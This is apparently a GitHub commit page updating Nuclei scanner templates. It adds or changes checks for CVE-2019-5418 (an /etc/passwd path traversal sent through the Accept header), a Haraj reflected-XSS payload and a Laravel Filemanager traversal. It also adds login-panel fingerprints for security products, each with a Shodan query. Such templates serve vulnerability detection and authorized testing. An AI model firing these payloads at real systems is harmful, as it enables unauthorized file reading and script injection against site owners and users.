Skip to content

Commit a18c0de

Browse files
committed
Up PoCs 2022-09-18
1 parent b76185a commit a18c0de

10 files changed

+187
-4
lines changed

config/nuclei-templates/cves/2019/CVE-2019-5418.yaml

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,16 +20,20 @@ requests:
2020
- method: GET
2121
path:
2222
- "{{BaseURL}}"
23+
2324
headers:
2425
Accept: ../../../../../../../../etc/passwd{{
26+
2527
matchers-condition: and
2628
matchers:
2729
- type: status
2830
status:
2931
- 200
32+
- 500
33+
3034
- type: regex
35+
part: body
3136
regex:
3237
- "root:.*:0:0:"
33-
part: body
3438

3539
# Enhanced by mp on 2022/04/12

config/nuclei-templates/cves/2022/CVE-2022-29548.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@ info:
1818
metadata:
1919
google-query: inurl:"carbon/admin/login"
2020
verified: "true"
21-
tags: cve,cve2022,wso2,xss
21+
tags: cve,cve2022,wso2,xss,packetstorm
2222

2323
requests:
2424
- method: GET
Lines changed: 43 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,43 @@
1+
id: CVE-2022-31299
2+
3+
info:
4+
name: Haraj v3.7 - Cross Site Scripting
5+
author: edoardottt
6+
severity: medium
7+
description: |
8+
Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form.
9+
reference:
10+
- https://github.com/bigzooooz/CVE-2022-31299
11+
- https://nvd.nist.gov/vuln/detail/CVE-2022-31299
12+
- https://angtech.org
13+
classification:
14+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15+
cvss-score: 6.1
16+
cve-id: CVE-2022-31299
17+
cwe-id: CWE-79
18+
metadata:
19+
verified: "true"
20+
tags: cve,cve2022,haraj,xss
21+
22+
requests:
23+
- method: GET
24+
path:
25+
- "{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
26+
27+
matchers-condition: and
28+
matchers:
29+
- type: word
30+
part: body
31+
words:
32+
- '><script>alert(document.domain)</script></textarea>'
33+
- 'content="nextHaraj'
34+
condition: and
35+
36+
- type: word
37+
part: header
38+
words:
39+
- "text/html"
40+
41+
- type: status
42+
status:
43+
- 200

config/nuclei-templates/cves/2022/CVE-2022-35413.yaml

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,10 @@ info:
1111
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413
1212
- https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview
1313
classification:
14+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15+
cvss-score: 9.8
1416
cve-id: CVE-2022-35413
17+
cwe-id: CWE-798
1518
metadata:
1619
shodan-query: http.title:"Intelligent WAPPLES"
1720
verified: "true"

config/nuclei-templates/cves/2022/CVE-2022-40734.yaml

Lines changed: 5 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -3,17 +3,20 @@ id: CVE-2022-40734
33
info:
44
name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
55
author: arafatansari
6-
severity: high
6+
severity: medium
77
description: |
88
UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
99
reference:
1010
- https://github.com/UniSharp/laravel-filemanager/issues/1150
1111
- https://nvd.nist.gov/vuln/detail/CVE-2022-40734
1212
classification:
13+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
14+
cvss-score: 6.5
1315
cve-id: CVE-2022-40734
16+
cwe-id: CWE-22
1417
metadata:
15-
verified: true
1618
shodan-query: http.html:"Laravel Filemanager"
19+
verified: "true"
1720
tags: cve,cve2022,laravel,unisharp,lfi,traversal
1821

1922
requests:
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: bitdefender-gravityzone
2+
3+
info:
4+
name: Bitdefender GravityZone
5+
author: DhiyaneshDK
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: title:"Bitdefender GravityZone"
10+
tags: panel,bitdefender
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- "{{BaseURL}}"
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: word
20+
part: body
21+
words:
22+
- '<title>Bitdefender GravityZone</title>'
23+
24+
- type: status
25+
status:
26+
- 200
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: darktrace-threat-visualizer
2+
3+
info:
4+
name: Darktrace Threat Visualizer
5+
author: DhiyaneshDK
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: html:"Darktrace Threat Visualizer"
10+
tags: panel,darktrace
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- "{{BaseURL}}/login"
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: word
20+
part: body
21+
words:
22+
- '<title>Login | Darktrace Threat Visualizer</title>'
23+
24+
- type: status
25+
status:
26+
- 200
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: datadog-login
2+
3+
info:
4+
name: Datadog Login Panel
5+
author: DhiyaneshDK
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: title:"Datadog"
10+
tags: panel,datadog
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- "{{BaseURL}}/account/login"
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: word
20+
part: body
21+
words:
22+
- '<title>Datadog: Log In</title>'
23+
24+
- type: status
25+
status:
26+
- 200
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: sentinelone-console
2+
3+
info:
4+
name: SentinelOne - Management Console
5+
author: DhiyaneshDK
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: title:"SentinelOne - Management Console"
10+
tags: panel,sentinelone
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- "{{BaseURL}}/login"
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: word
20+
part: body
21+
words:
22+
- 'SentinelOne - Management Console'
23+
24+
- type: status
25+
status:
26+
- 200
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
id: webroot-login
2+
3+
info:
4+
name: Webroot - Login
5+
author: DhiyaneshDK
6+
severity: info
7+
metadata:
8+
verified: true
9+
shodan-query: title:"Webroot - Login"
10+
tags: panel,webroot
11+
12+
requests:
13+
- method: GET
14+
path:
15+
- "{{BaseURL}}/Login"
16+
17+
matchers-condition: and
18+
matchers:
19+
- type: word
20+
part: body
21+
words:
22+
- '<title>Webroot - Login</title>'
23+
24+
- type: status
25+
status:
26+
- 200

0 commit comments

Comments
 (0)